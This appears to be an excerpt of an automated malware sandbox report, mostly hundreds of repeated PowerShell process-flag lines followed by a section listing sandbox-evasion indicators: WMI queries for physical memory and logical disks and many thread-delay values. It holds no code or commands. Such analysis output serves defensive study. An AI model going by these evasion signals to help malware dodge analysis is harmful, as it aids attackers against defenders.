        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 971
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8947
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 833
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8222
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1597
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9355
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1149
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9430
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9304
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 488
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9262
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 512
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8203
